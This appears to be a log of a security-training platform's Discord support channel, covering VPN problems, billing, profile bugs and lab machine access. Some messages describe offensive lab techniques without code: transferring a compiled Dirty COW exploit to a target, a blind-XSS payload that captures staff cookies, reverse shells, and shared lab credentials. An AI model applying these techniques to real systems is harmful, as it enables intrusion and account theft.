#site-support

1 messages · Page 255 of 1

naive dust
#

basically run this commands

cd ~/downloads
git clone https://github.com/tryhackme/openvpn-troubleshooting
cd "cloned folder" 
sudo ./"toolname"
scenic torrentBOT
#

Gave +1 Rep to @restive berry

desert sparrow
sudden yacht
#

why did my streak go to zero? i haven't missed a day?

cursive escarp
#

hello

#

how to work in web site on VM (demo.uploadvulns.thm)

#

not/Upload Vulnerabilities

Tutorial room exploring some basic file-upload vulnerabilities in websites

38%

silk hamlet
#

hello

#

I can't see the wreath vpn file? Why?

crystal marlin
silk hamlet
crystal marlin
silk hamlet
#

but i will try a hard refresh

crystal marlin
silk hamlet
#

not my first lab

crystal marlin
# silk hamlet not my first lab

Ye, just making sure as you sent an image that wouldn't show if you still in the room or not, as you get kicked out of it after 7 days.

silk hamlet
#

let me clear my cache and try again

#

Also i use adblockers, could that also be?

crystal marlin
crystal marlin
# silk hamlet ok

Was just trying to join wreath and then check the access page if it's working for me. It was, so just to let you know that this seems to be not an issue on THM`s side.

silk hamlet
#

I am frustrated

crystal marlin
crystal marlin
# silk hamlet Same thing on chrome

Mh, if there is no button to join the wreath room with chrome either, then I don't know what else to do the to either wait for tomorrow to see if it's working then, or to send an email to the support.

#

Last thing that might come to my mind is trying to log out of your account and back in

silk hamlet
#

Still chrome

crystal marlin
# silk hamlet On chrome, I did that

Well, then I have no idea why it's not working unfortunately. So like I said, wait for tomorrow to see if it's working then as it might some coincidence with the 7 day kick timer, or write the support a message. Does the answer buttons say something like "You have to join the room first" or just the green "Submit" buttons?

silk hamlet
#

I will send a mail. Thanks for the help

cursive escarp
#

how to work in web site on VM (demo.uploadvulns.thm) (edited)
[10:44 AM]
not/Upload Vulnerabilities

Tutorial room exploring some basic file-upload vulnerabilities in websites

38%?????????

crystal marlin
unique wigeon
#

hello im having issues using ssh to connect to a deployed machine in my terminal. I have done all the necessary check to varify that openvpn is connected and working. But when i try to ssh into the machine, i am prompted to input a password but the room does not give any password for me to input for connecting. Am i missing something? I tried for example, sudo ssh tryhackme@10.10.217.211, and that didnt work. Then i tried the machines name. sudo ssh polosmb3@10.10.217.211 and that didnt work either. Please help if you can.

stray cove
#

you aren't meant to SSH into that machine

#

please read the room task carefully 🙂

sick aspen
#

Hi, after 7 days strike it said I get a badge (got it) then Access Network ... I see nothing about that

brave zealot
#

Hi

#

How can i use tryhackme lab machine on my linux ?

#

I connected it with open vpn and the server is connected

#

The machine has also started but what am i supposed to do?

crystal marlin
brave zealot
#

I have the machine ip and it is saying access it using open vpn or attackbox

crystal marlin
brave zealot
#

I want to use openvpn

crystal marlin
brave zealot
#

The attack box is only 1hr so i formed my own kali virtual machine

#

Installed openvpn and linked it to the tryhackme server

#

I have the machine ip and want to use it in kali on vm

crystal marlin
brave zealot
#

:)

crystal marlin
brave zealot
#

Ya sry :')

crystal marlin
brave zealot
#

Yes

#

Daym

#

Got it

#

XD

crystal marlin
# brave zealot Yes

Then go ahead and do that, it's telling you the syntax you have to use and the password

brave zealot
#

Yes

#

Thanks

naive dust
#

so when i start my kali machine in virtualbox i get this

#

Failed to open a session for the virtual machine kali.

Call to NEMR0InitVMPart2 failed: VERR_NEM_INIT_FAILED (VERR_NEM_VM_CREATE_FAILED).

Result Code: E_FAIL (0x80004005)
Component: ConsoleWrap
Interface: IConsole {872da645-4a9b-1727-bee2-5585105b9eed}

#

cant find anything helpful in the forums

eager fulcrum
#

@naive dust This channel is for directly THM related tech support like site or VPN issues.

brave zealot
eager fulcrum
naive dust
#

oh

royal wigeon
#

Is there a way to put full name on certificates and badges?

hollow yew
#

Hello my machine wont stop and its down so idk what to do

crystal marlin
hollow yew
#

i cant end it to restart it

#

and when i ping it

#

or run any scripts

#

against it

#

its down

crystal marlin
hollow yew
#

dont work

#

tried it

crystal marlin
#

Ctrl + F5?

hollow yew
#

nope

#

ill just ahve to wait

#

for it to expire

cursive escarp
#

how to rest mymachin not good working

pearl kettle
#

I registered via my student mail to get the student's discount but my email wasn't recognized, so I contacted the support team via mail but I've not heard from them for more than 10 days now.
Any ideas ?

novel bolt
#

My streak days when to zero. Missed one day but had a one day streak and a seven day streak ticket redimmed.

jagged wagon
#

Hey I have billing issue with my subscription. Kindly help me to whom I should get in touch with?

agile inlet
#

What else do I need to do for this badge?

sudden yacht
#

I've tried using the customer support link and emailing support@hackme.com about this issue and have not gotten any feed back. I've hacked every day since Oct 20th and my hack streak says one. Does anyone know what I should try next?

thorn osprey
#

Can someone help me understand what is considered a daily question on thm?
I am fairly new but I couldn't find the answer on the FAQ or the learning page.
I want to understand so I can start building a streak but I feel like a bit of a dunce rn.

quick smelt
#

anyone know how to enable corner snaping in ubuntu? like dragging an application to a corner and it takes up 0.25 of the screen

abstract raven
abstract raven
sudden yacht
abstract raven
#

Yea. They'll get around to it. I'm gonna assume you lost your streak even tho you shouldn't have. Just keep your streak up until they get to it and they put you where you should be

thorn fox
#

@naive dustsounds like a heating problem.

winter solstice
#

And check the programs that are running background in task manager

#

@naive dust

knotty kestrel
#

I swore I saw a process called world of warcraft installer on my linux pc once

#

It was like sighting a ufo

drowsy shell
#

hi , i cant seem to open vulnersity room website

#

Do i need to add it to etc/hosts ?

#

cannot openit using attackbox as well.

muted oxide
#

looks like the openvpn is down for THM

crystal marlin
drowsy shell
#

just the website url

crystal marlin
drowsy shell
#

I could open other's room IP easily

muted oxide
#

i cant start openvpn, as the network unreachable

crystal marlin
drowsy shell
#

not yet. I just started it

#

I just completed the juice shop earlier in Pentest + room

#

and it worked just fine

crystal marlin
drowsy shell
#

So, both website and gobuster cmd will work after i completed task 2?

crystal marlin
drowsy shell
#

ahhh cheers mate

#

Also my url is wrong i accidentally put http's' in it 💀

limpid current
#

@deep trellis can I talk with you?

bronze vale
#

May I ask what it’s about @limpid current ?

I may be able to assist:)

analog beacon
#

@bronze vale is it possible to ask to you about the strike aswell ? Or is it enough I already sent an email ?

bronze vale
scenic torrentBOT
#

Gave +1 Rep to @bronze vale

cinder wraith
#

Hi There I have signed up on the website, initially it was showing me prices i £ (in the UK), however since I filled in some more of the details the prices are in $. I looked at my account and beside my phone number the country Afghanistan is selected. I suspect this is having an affect on location settings related to my account. I have made many attempts to change it, but it always goes back to Afghanistan.

earnest furnace
#

I had a question about how to change the billing address on my subscription. I was paying for premium for several months, then had to move due to work. My billing address was updated at my bank, so when THM tried to bill me they got an error because my billing address did not match what they had on file. I had to go in and manually pay for 3-4 times, before finally just canceling my subscription. I tried to go back in this morning and start my subscription again, but it just goes back to the saved payment methods, and will not allow me to enter an updated billing address. Please help 🙂

lament trout
#

@cinder wraith can I ask how did you try changing the country?

cinder wraith
#

@lament trout By clicking the little flag beside my phone number. I tried to upload a screenshot here, but cant seem to figure that out blobhuh

lament trout
#

!docs verify

sharp bisonBOT
naive dust
#

Can't verify

supple falcon
#

Hey! I was just wondering how the student discount works :)

#

I've signed up with a .ac.uk address, but the prices are still the same 👀

runic wave
#

How does one change the country associated with their THM profile?

lament trout
crystal marlin
magic plume
#

Curious question, is there a reason there isn't a US-East-VIP VPN connection? I'm assuming being a subscriber I would have access to the VIP connections but the only one I see is west

livid vapor
#

Not a definitive answer, but my guess is that there isn't enough east coast traffic to merit a VPN there.

edgy thunder
#

Hello there, how can i change the name on the learning path certificate of Jr. Penetration Tester?

chrome lintel
#

hey, can someone help me, in my virtual machine i can't acess any website, it just keeps loading until it time's out

lament trout
#

@Kloose#4436

  1. did you connect to the VPN?
  2. does 10.10.10.10 load?
brave zealot
#

My ssh command is not working in kali
It is just waiting and after some time it shows connection closed

#

It is showing closed by port 22

lament trout
#

@brave zealot which room and task?

#

@naive dust the best solution would be to take a backup and redo the OS installation.

fading saddle
#

is there a way to regenerate a badge image?

lament trout
fading saddle
#

i was wondering because the badge image didn't update my rank

brave zealot
#

I am using a virtual machine with kali installed
SSH was working fine yesterday but now it is just waiting getting timed out again again

#

I deleted the whole machine and formed a new one but the problem continues

crystal marlin
crystal marlin
# brave zealot Yes

Should I try if I can ssh into your target machine in order to check if the issue is on your side or the machines side?

brave zealot
#

Ok

#

I have to give you the ip address of target machine right?

brave zealot
#

10.10.96.199

#

The problem is probably on my side .. i just don't know what

#

:,-)

crystal marlin
brave zealot
#

In my vm

crystal marlin
#

If you enter ifconfig do you only see a tun0 interface or any extra like tun1, tun2 etc?

brave zealot
#

Only tun0

crystal marlin
# brave zealot Only tun0

Then try that setting sudo ifconfig tun0 mtu 1200 and connect again to the target machine, in case that doesn't help just put it back to 1500

brave zealot
#

It worked

#

Can you explain me a little bit what happened? I was wondering for hours

crystal marlin
brave zealot
#

So can it happen again?

crystal marlin
#

Sure, as soon as you restart your machine the mtu setting will be on default again.

brave zealot
#

K

#

Thanks for the solution:-)

dire otter
#

hey

#

my country is INDIA but why does it automatically got changed to afghanistan

#

??

#

i just gave my correct phone number

lament trout
#

@dire otter did you click on that promt on the site that asked for your phone number?

dire otter
#

ye i entered the phone no.

lament trout
#

even I clicked on that and it changed to Afghanistan for me, just change it back.

dire otter
#

Thank you @lament trout

scenic torrentBOT
#

Gave +1 Rep to @lament trout

obtuse pagoda
#

Hey

golden yacht
#

Got a question for anybody who knows. What specification do I need to look at to see if a transmitter can send over photos and or videos. Example in my case I'm trying to figure out if a BMD-340 Stand-alone Bluetooth module can send over video and or photos. Thanks!

#

These are the features of the chip

#

Based on the Nordic Semiconductor nRF52840 SoC
• Bluetooth 5 PHYs: LE 1M, LE 2M, and LE Coded (long range)
• Bluetooth 5 features: Advertising Extensions, Channel Selection Algorithm #2
• Bluetooth mesh
• IEEE 802.15.4 with Thread and Zigbee support
• Complete RF solution with an integrated PCB antenna
• Integrated DC-DC converter
• No external components required
• Arm® Cortex®-M4 with FPU 32-bit processor
• Arm® TrustZone® Cryptocell 310 security
• True random number generator
• Serial Wire Debug (SWD)
• Nordic Semiconductor SoftDevice ready
• 1 MB embedded flash memory
• 256 KB RAM
• 48 General Purpose I/O Pins
• 12-bit/200 KSPS ADC
• One Full-Speed USB (12 Mbps)
• Four SPI Master/Slave (8 Mbps)
• Quad SPI with Execute in Place (XIP)
• PWM 4 blocks x 4-channels each
• General Purpose and Low power comparators
• Temperature sensor
• Two 2-wire Master/Slave (I2C compatible)
• I2S audio interface
• Two UARTs (w/ CTS/RTS and DMA)
• 20-channel CPU independent Programmable Peripheral Interconnect (PPI)
• Quadrature Demodulator (QDEC)
• 5 x 32 bit timer/counters
• 3 x 24 bit Real Timer Counters (RTC)
• NFC-A tag interface for OOB pairing
• Dimensions: 15.0 x 10.2 x 1.9 mm

dim lantern
#

Anyone please tell me how to connect external wireless adapter to kali in virtual box because when I am connect and run kali it crash my main machine please help me

thick relic
#

Hey there,

I'm currently enrolled in the Linux fundamentals pt. 3 and am having issues ssh'ing into the box. It says that the password is "tryhackme" but I keep getting denied.
Steps I've taken to make remediate:

  1. Double/Triple-checked to make sure the IP address and username was correct
#

2.Made sure to check the password was correct
3. Restarted machine

golden yacht
#

I was having the same issue yesterday

thick relic
thick relic
golden yacht
#

I haven't tried this morning yet

primal kiln
#

Any way to force reset a network? Was running fine for Holo Network this morning, then it shut off due to timeout. Restarted it and now I can't connect via VPN or attack box at all. Rather not wait 4 hours to put a reset request in if possible. Hoping letting it shut off again and then rebooting it will fix it.

quasi whale
#

Hi guys, I could use some help. I have Kali on Vmware and my network usually works but now it doesn't anymore even though I didn't change anything (knowingly). It happened to me before but I got it to work some how

#

This are my settings for Kali

#

and my vmware-netcfg

#

nvm it works again, do I have anything wrong with my settings tho?

white trail
#

If you have some virtual network adapters from other programs, sometimes VMware will try to automatically bridge to those instead of the interface that's actually connected to your network

#

If you create a vmnet, set it to bridged, then where it says Bridged to: Automatic, you can manually select the network interface you want to bridge to

#

Then just set your VM to use the vmnet you created

quasi whale
#

okay will remember that, thanks

naive dust
#

Any THM staff to assist me? I have faced issues related to due payment

bronze vale
#

Email me

#

!email

sharp bisonBOT
bronze vale
#

@naive dust

naive dust
#

i emailed yesterday. Provided all the details in email. Can you please solve the issue? @bronze vale

cinder wraith
#

OK I am back with the screen shot. This is where I try to change the country, but it keeps going back to Afghanistan (I am in UK). I think there is some sort of Locale problem, as since this has started, prices are in $ and not £.

crystal marlin
cinder wraith
crystal marlin
cinder wraith
scenic torrentBOT
#

Gave +1 Rep to @crystal marlin

royal briar
#

My Attackbox looks like a regular linux server and not the usual GUI..
I tried resetting many times with no luck. What can I try?

white trail
#

I'd believe that's the intended behaviour of that room

#

You should be able to just enter commands into it so you don't have to ssh

royal briar
#

Seems odd, but i'll give a go. Thanks.

royal briar
scenic torrentBOT
#

Gave +1 Rep to @white trail

heavy jungle
#

hey guys, do anyone know if i can access a amazon s3 server withou the web interface?

fierce harbor
#

Hey, I have the 7 day streak freeze tickets but I don't think it worked as I missed just 5 days and my streak is gone

near rose
#

hey

#

anybody can please help me in post exploitation basics room

#

I am in task 3

#

4.) Transfer the loot.zip folder to your Attacker Machine

#

it says this when I use scp

#

thats in my my VM

quaint spruce
mortal hinge
#

hello guys, so I reinstalled kali and I get this error when I am trying to run my vm

#

Call to NEMR0InitVMPart2 failed: VERR_NEM_INIT_FAILED (VERR_NEM_VM_CREATE_FAILED).

Result Code:
E_FAIL (0x80004005)
Component:
ConsoleWrap
Interface:
IConsole {872da645-4a9b-1727-bee2-5585105b9eed}

grave ridge
#

try this

#

maybe this works

#

@mortal hinge

#

not trying to sound rude but i think it would be useful if you tried using google first bc it would help more in the long-term so you know how to research your future problems easier

mortal hinge
#

I found a good tutorial it works now

abstract raven
#

Nice. In general, most error messages have been reported and solved already. Most of the time just copy pasting the error message into Google will give you a solution real fast

thick terrace
#

I can't do the task bcz of burp suite issues.

placid mango
#

Show screenshot of full error.

thick terrace
placid mango
#

Sure, no worries. Post it in #infosec-general as this channel is for support related to vpn and site issues.

thick terrace
#

Thanks

safe sorrel
#

Good morning, hope you all are well.
My profile changed my Country to Afganistan (should be South Africa), tried to change the number feild on my profile, but that didn't change anything. Is there anything that I can speak to, to change this?

lament trout
#

@safe sorrel click on the flag next to your number and see if you can change the country.

safe sorrel
#

Tried that, it says that it updated, though the change doesn't reflect on the profile

naive dust
#

is there something going on with the servers in the rooms? They hang for a few minutes losing connection, and than they work for a few minutes

naive dust
#

hi

#

trying this for the first time

#

I can't connect

#

I don't have any VPNs on, just the web based thing

night elk
#

Hi Team

#

I could not find Flags after clicking on the website link provided

#

Room : Walking An Application - Jr. Penetration Tester

#

Viewing the page source I could not find the answers to the questions

#

please help me on this

eager fulcrum
night elk
#

Thanks

naive dust
#

only thing I could find online is some proxy issue causing it

#

but I don't have a proxy on

drowsy bronze
#

Hi... Thank you for keeping one of the greatest resources in the web running. I really enjoy using it and subscribed today for a full year.

When I look at my profile page, it says that I am being charged £90.00, though the payment was $90.00. I am located in Denmark and paid in dollars, so I assume that the text on the profile is taking the amount of the payment and then using a pound sign because I am located in Europe.

bronze vale
#

Verify with your bank statement and not the site please

drowsy bronze
#

I did and everything is fine. I simply mention it, in case other people freaks out over the difference in currencies later on 🙂

vapid mirage
#

---hi, doing https://tryhackme.com/room/fileinc the webserver appears to not start (task 2) nmap confirms no hidden ports -sS -p0- restart no change. how to i report the issue? i have been doing other rooms today and connect via openvpn---
ignore this apparently my open vpn had failed silently and restarting it has fixed my issue

raw wave
#

Hey guys, I was told to move my questions here. I am having issues exploiting the machine in task 5 of linprivesc. I have compiled c0w.c and have opened a server but when I try to download it in the ssh'd user i get permission denied.

#

Any thoughts?

shy jungle
raw wave
shy jungle
#

in that second image, you've not provided the port in the wget command

acoustic cape
raw wave
#

God

#

its the little things😅

acoustic cape
#

also I wanted to ask, how can I get unverified on old account and verify there on this one?

#

ps: I do not have access to my old discord account

raw wave
shy jungle
raw wave
shy jungle
delicate wasp
#

If you're getting a 405 error then your file isn't even downloading

#

If it's a binary did you try running type against it?

raw wave
#

God, i used a different exploit and boom 3 days of work figured out

acoustic cape
crystal marlin
acoustic cape
#

okay

#

@barren birch I wanted to ask, how can I get unverified on old account (I do not have access to it) and verify there on this one?

latent galleon
civic wren
#

Hi team, my account keeps showing the Afghanistan flag although I am in United States. Could anyone help me with this?

naive dust
#

@civic wren click on the flag and select United States

zealous yoke
scenic torrentBOT
#

Gave +1 Rep to @zealous yoke

naive dust
#

Can I get help about Kali Linux install?

lament trout
naive dust
#

Thanks

slow abyss
#

Hi could someone help me with getting a subscription as a student?

abstract raven
slow abyss
#

ah, I understand. My mail address is in this format: [student number]@student.[college domain]

abstract raven
#

Yea. So you should be able to just email support

#

!email

sharp bisonBOT
fleet narwhal
#

Using openvpn, I have full connectivity and an assigned IP but cannot ping any of the boxes I start. Why could this be?

#

I use arch btw 😏

#

Some boxes do work - the tutorial box spins up fine

#

Ugh. Now it works. lol

tall sphinx
#

can i get to know a wifi password using nmap>?

#

@zealous yoke

analog pike
#

@deep trellis and @zealous yoke , Is there a problem with Task 8, Cross-Site Scripting room ? After decoding the cookie and the session . When submitting the decoded cookie . I get wrong answer

keen scroll
keen scroll
# tall sphinx then who should i tag ?

You don't need to tag anyone for a simple question
If you have a big problem, you may tag either a Discord staff or a THM staff member
See the member list in your Discord application to find out who is currently online to help you out.

keen scroll
scenic torrentBOT
#

Gave +1 Rep to @keen scroll

bronze vale
zinc lichen
#

Hi There,

I have been doing the learning paths. In the Web Fundamentals Learning Path there is a room called LFI which is in a broken state.
Tried first for hours, then looked at write-ups.

It is not possible currently to break-out of the displayed error message: No such file /opt/web/<filename>
Cant break out of it with null-byte / adding commands ( this isn't even mentioned in the write-ups )
So I wanted to share this information ...

acoustic cape
#

hey @graceful garden is it possible for me to somehow unverify my old discord account which i have no access to and verify this one?

cobalt lagoon
#

Hi, i have a question i'm not sure i'm in the good text chat, but i can't change my flag on my public profile it's stuck in Afghanistan flag and when i change it it's not changing do you know why ?

small goblet
#

hi, how do i disconnect my openvpn after im done on THM?

#

im on linux

crystal marlin
small goblet
#

@crystal marlin thanks brother

scenic torrentBOT
#

Gave +1 Rep to @crystal marlin

jade yoke
#

Hi, I have a question I stuck on Authentication Bypass since I cannot access the signup page even after start the machine. What should I do? Thank you

crystal marlin
cobalt lagoon
scenic torrentBOT
#

Gave +1 Rep to @crystal marlin

edgy seal
#

anyone else has the problem, when they terminate a machine and want to start another one that it says, machine already running? when i refresh it show the old machine again...
I can't seem to terminate a machine that is running already?

short yoke
#

hello,what is the minimum age for signing up at tryhackme?

edgy seal
#

don't think there is ..

crystal marlin
edgy seal
#

Ill try that next time.. thanks @crystal marlin

scenic torrentBOT
#

Gave +1 Rep to @crystal marlin

brisk nacelle
#

I want to subscribe to a premium account how can i get the student discount

shadow arch
#

Hey guys, is there a way to force the discord bot to refresh rank/subscription/lvl ?

crystal marlin
shadow arch
#

I tried but it said '
Your level is already up-to-date.'

lament trout
#

is it not up-to-date?@shadow arch

shadow arch
#

No, I'm almost 0x9 and it still says 0x7

#

It does show subscriber now though

crystal marlin
shadow arch
naive dust
#

Greetings #site-support - A quick question - I am receiving the following "Uh-oh! You can only deploy a maximum of 3 machines at a time." When I attempt to start a machine, would you mind in sharing the procedure for determining which machines are currently running? or how do I gain access to them?

crystal marlin
naive dust
scenic torrentBOT
#

Gave +1 Rep to @crystal marlin

sick aspen
#

Hi, I updated my Country and it always change for Afghanistan ...

stray cove
swift forge
#

Hello! i have was intended to buy 1 month subscription but by mistake bought 15 months.... Could any one help me on how to get refund... $150 is a huge amount for me

crystal marlin
#

!email

sharp bisonBOT
swift forge
#

Thank you. Sent email just now

ivory bough
#

Hey, on OWASP Top10 is a link on Task 10 to xss-payloads.com. This Site looks like down

#

Task20 sry

abstract raven
wild vine
#

Hi All I have been using the provided attack boxes in most of my rooms, I just recently setup my own Linux box. I have setup the openvpn and downloaded my .ovpn file. I have setup ssl with a self signed cert and I have also setup ftp. Using the attackbox I can reverse shell just fine. But when I try on my own linux box the reverse shell is not working. In addition to SSL what do I need to do to get the reverse shell working. Do I need to open a series of ports for SSL? I am assuming that the reverse shells , in most cases use SSL?

crisp tinsel
#

It’s interesting that several of the same people keep winning monthly vouchers. Also, no one under lvl 8 seem to win…

neon ice
#

Hi. How do I use the code to subscribe? Also cannot find where to change my country in the profile

outer maple
#

hello could anyone help as to what this option is for while creating a room?

spare flare
#

How much time need to complete this room in minutes

outer maple
spare flare
#

Nothing. It is used to calculate resources needed for this room in my opinion

lime dock
#

Hi does anybody know if the voucher purchase for a sub can take a discount code? Or do I just wait for my sub to expire and then choose VIP from profile and purchase it that way?

naive dust
#

can we not change our about once updated??

forest orbit
#

Helllo
Mystick ctf room , it says the owner has made the room private
Am I not able to do that machine now?

placid mango
#

Not unless its made public again.

runic barn
#

hi guys. Anyone knows why if i connect through VPN (windows or kali on a VM, anyway) to a practical room, the webpages doesn't load on firefox, but it does if i connect through the Attack Box?? Is that an common problem? I would like to work with the practical rooms with my Kali...

near rose
#

hi guys

#

I am trying to connect to a windows machine through rdp

#

its giving me this

outer maple
#

It says authentication failure check creds, last line from below

lament trout
lament trout
crystal marlin
#

You are accessing the attackbox in the split view in your browser, right?

#

If you are not a subscriber your attackbox has no internet connection.

near rose
lament trout
sharp bisonBOT
near rose
#

thanks

#

thats the command I am typing

spare flare
#

Send a mail to support

oak ice
#

I have a brand new beginner question that i hope someone could answer for me. I just signed up for the website (free user). Before starting doing anything on the website. Do i need to run a VPN or open the website in a VM first (pretty much running a VM in an VM)? I was about to start the tutorial and saw it mentioned opening the attackbox and wasn't sure if i need to run this website in my VM first or if it's fine on my host /personal computer

near rose
#

you can run the website on you personal computer

#

and use the attackbox which is basically a VM on your browser

oak ice
scenic torrentBOT
#

Gave +1 Rep to @near rose

solid path
#

The Redline room VM is extremely slow. Doing some excercises takes 75% waiting time. Can you assign more resouces to these VMs or an option to download a VM to run it locally?

sleek jackal
lament trout
oak ice
scenic torrentBOT
#

Gave +1 Rep to @lament trout

near rose
rugged beacon
#

I'm reading the sec+ study guide put out by comp tia, am I having a stroke or does this just make not make sense?

lament trout
#

@near rose which room?

sharp heron
#

so i got a message while doing sqli room and it said add an hour your machine is about to expire while i had an hour and fifty minutes then i got a message indicates that my machine expired ( i still have access to it ) and i can't run the other machine cause i have already one machine that i can't terminate what do i do

grave ridge
#

i get this error whenever i try to export (this is Advent of Cyber 2), also happens with burpsuite when i try to export on repeater

#

If i run burpsuite as root it's fine, but is there a way I can export without running as root

ruby swallow
#

have an issue where none of the IP's I receive work even if I switch to ac complete different box

crystal marlin
grave ridge
#

idk where else to put this but I literally can't move files to my Documents folder on kali from a file in a folder in documents without sudo

crystal marlin
#

Maybe something there is owned by root.

grave ridge
#

forget it

#

wbu my burpsuite problem

#

and wireshark?

#

is it the same thing

crystal marlin
#

Well maybe you are trying to export to a directory where you don't have write permission to.

#

In what directory are you trying to export that file to?

grave ridge
#

ok i worked it out

#

but gimmie a sec

#

i got another question

#

what does the second file owner thing mean

#

like how it says kali then it says root

#

I made a stupid mistake of making the dir with root

crystal marlin
#

The first one is the owner and the second one is the group.

#

But you can simply change that with sudo chown kali:kali AoC2

#

Or as you are logged in as root you don't need to use sudo, either way should work.

grave ridge
#

crap I accidently changed every owner to kali from /

crystal marlin
#

Ouch ^^

grave ridge
#

big ouch

#

wth do i do now

#

I should take snapshots

#

I'm an idiot

#

oh well

#

looks like I'm gonna have to reinstall kali

crystal marlin
#

Well I don't even know if you can undo that, but maybe google "undo previous command linux", maybe there is something.

grave ridge
#

time to uninstall i messed up :(

#

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHHHHHHHHHHHHHHHHHHHHHHHH

#

I HATE THISADJDSA:LFfldsjkl;asdfj

#

ok I need to keep calm

#

nearly 1am

grave ridge
#

lesson learnt, NEVER MAKE BLOODY DIRECTORIES AS ROOT UNLESS NEEDED TO

#

:)

abstract raven
grave ridge
#

ok i finished reinstalling kali

near rose
cursive escarp
#

i need verify my discord 3 week not verify why ?

lament trout
#

@cursive escarp !docs verify

#

!docs verify

sharp bisonBOT
cursive escarp
lament trout
cursive escarp
#

i send several time but not verify

lament trout
#

what does it say?

cursive escarp
#

hi i want verify my discord account

#

i did exact steps inside the like you send it here
and i send my code to the Bot account mentioned in the link above
it doesn't reply me yet what should i suppose to do? Any Help here Thanks in advance

lament trout
#

hey @near rose I tried RDP using remmina just for you and it worked in single try.
username: Administrator
password: P@$$W0rd its a zero and not alphabet O
domain: CONTROLLER

#

I also tried ssh as mentioned in task 2, that works fine as well.
ssh Administrator@<IP>

eager raptor
lament trout
crystal marlin
lament trout
#

oh

eager raptor
real elk
#

Hello can I get some admin support please regarding a payment issue ?

near rose
scenic torrentBOT
#

Gave +1 Rep to @lament trout

near rose
#

I needed to change the settings

sharp bisonBOT
grave ridge
#

wrong chat oops

hollow blaze
#

Does anyone also have problems connecting to the Windows Privesc machine In Jr Pentester Path? For some reason the machine just want load. I have tried multiple restarts . I wish they would have provided RDP credentials.

sinful loom
#
C:\Users\Surface>nmap -p- 192.168.1.145
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-21 16:31 Hora estßndar romance
Nmap scan report for 192.168.1.145
Host is up (0.011s latency).
All 65535 scanned ports on 192.168.1.145 are in ignored states.
Not shown: 65535 closed tcp ports (reset)
MAC Address: 8E:A2:0E:33:08:13 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 22.26 seconds
#

How does my mobile phone connect to the internet if it does not have a single port open?

bronze vale
sinful loom
#

k

livid onyx
#

Hello, there. I have an issue with https://tryhackme.com/room/xssgi.
Task 8: Practical Example (Blind XSS)
I think there is a bug.
The link that was provided on the task is HTTPS, however, the payload is HTTP, in Firefox 78.14 it's impossible to fetch HTTP URL from a webpage opened with HTTPS. The error is "Blocked loading mixed active content". I've tried different variations. I was able to open web site with HTTP, create an HTTP payload and I received my cookie. But I didn't receive a staff cookie. As well I tried HTTPS web and HTTPS payload. As well I received a request, but it was encrypted obviously and I received only my request (when I opened the page with payload). I haven't received any stuff cookie requests.

crystal marlin
livid onyx
livid onyx
coral granite
#

On my public profile it always says that I'm from Afghanistan because is the first option in the settings. But i cannot change it....
Any idea?

stray cove
boreal yarrow
#

i have a problem with my discord account, i verified it with my personal account but i needed a new account for my study. Now my discord account is linked to an old account that is not being used instead of my school account on THM which i am using a lot.
Does anyone now how to change the linked account? using !verify with the new token doesnt work

livid onyx
#

@crystal marlin I've just tested it again and it works only on AttackBox.

coral granite
scenic torrentBOT
#

Gave +1 Rep to @stray cove

crystal marlin
scenic torrentBOT
#

Gave +1 Rep to @crystal marlin

remote raft
#

My subscription ended on 21/11, and I have no enough funds for it to be renewed. What should I do if I want to cancel the subscription?

#

Why am I still have subscriber status?

crystal marlin
remote raft
#

Yes, but after the charging which failed

crystal marlin
remote raft
#

Thanks

naive dust
#

!vpn

sharp bisonBOT
naive dust
#

!tool

proud palm
#

Any reason why I lost my 26 day streak randomly? Easily within the 24 hour mark as I worked last night this morning and tonight. It registered as my 26th day then reset 30 minutes later. I know it’s just a streak but it was a personal goal to get 30 days in a row. You can see on my profile activity how often I’m on as well.

hollow otter
elder wraith
#

is there a problem in IN SERVER i m not able to connect

timber zodiac
#

sorry 1 quest.
what if i cancel my subscription?
it expire at the renew date or immediately
tnks and sorry for dumb quest

hollow otter
#

Iirc you still subs until your subscription ends

timber zodiac
#

tnks

ivory bough
#

Good Morning, i try Room "wordpresscve202129447" but iam stuck at the connect to the DB. i dont know what can i do to fix it, google results cant help me 😦

elder wraith
#

which vpn r u using

ivory bough
#

openvpn

hollow otter
#

Are you sure you fully connected with thm vpn?

ivory bough
#

yes

#

iam on the WP Site

hollow otter
#

Haven't completed the room, but might worth to check writeup

ivory bough
#

i checked, i have successfully read /var/www/html/wp-config.php, so i got the DB Name, User and PW. Next Step is to connect with MySQL DB

hollow otter
#

Can you try to use mysql from attackbox?

ivory bough
#

yes of course, i think its a local probelm but idk how to fix it :(, i try now vm from THM and write Feedback

hollow otter
#

Update your vm maybe

ivory bough
#

Command 'mysql' not found, but can be installed with:

apt install mysql-client-core-5.7
apt install mariadb-client-core-10.1

On THM VM but i install packages

#

root@ip-10-10-60-184:~# mysql -u 10.10.117.230 -u thedarktangent -p
Enter password:
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2 "No such file or directory")

#

idk...

#

omg fail layer 8 😄

#

mysql -h http://10.10.117.230 -u thedarktangent -p.... without http it works 😄
works -> mysql -h 10.10.117.230 -u thedarktangent -p

hollow otter
#

Nicw

#

Sorry can't help that much

ivory bough
#

np, its all fine 🙂

#

thx

hollow otter
#

Glhf

rich juniper
#

#site-support in room Redline -> task 5 IOC Search Collector, images are not visible

hollow otter
#

Try refresh the page

rich juniper
#

tried

#

also tried in safari

#

and brave

#

same issue

hollow otter
#

It shows on mine

rich juniper
#

strange

hollow otter
rich juniper
#

below steps

#

after

#

IOC Search Collector will ignore the data that doesn't match an IOC you have gathered. Although, you can always choose to collect additional data. As the Redline User Guide states, the quality of the IOC analysis will depend on the data you have available in the analysis session.

#

i'm not able to paste screenshot here

#

or upload image

hollow otter
#

!docs verify

sharp bisonBOT
hollow otter
#

You can, but you have to verified first

rich juniper
#

doing

#

above in chrome

hollow otter
#

Try ctrl+f5

#

Hard refresh

rich juniper
#

above in safari

hollow otter
#

Is there any plugins on your browser

rich juniper
#

brave one is uploading

#

a

#

i had paused ghostery

#

but should have worked on other

#

i'm accessing from Dubai, any issue from here

hollow otter
#

What happened if you try open it from your phone

hollow otter
rich juniper
#

i'll give it a try from phone

hollow otter
#

Try thid

rich juniper
hollow otter
#

Strange

rich juniper
#

if chrome was the issue, it should have loaded in other browser

hollow otter
#

Yeah

#

Sorry, can't help that much

#

Might want to send an email to support

rich juniper
#

looks like ISP blocked some content here

#

i changed to US full tunnel vpn and it works

#

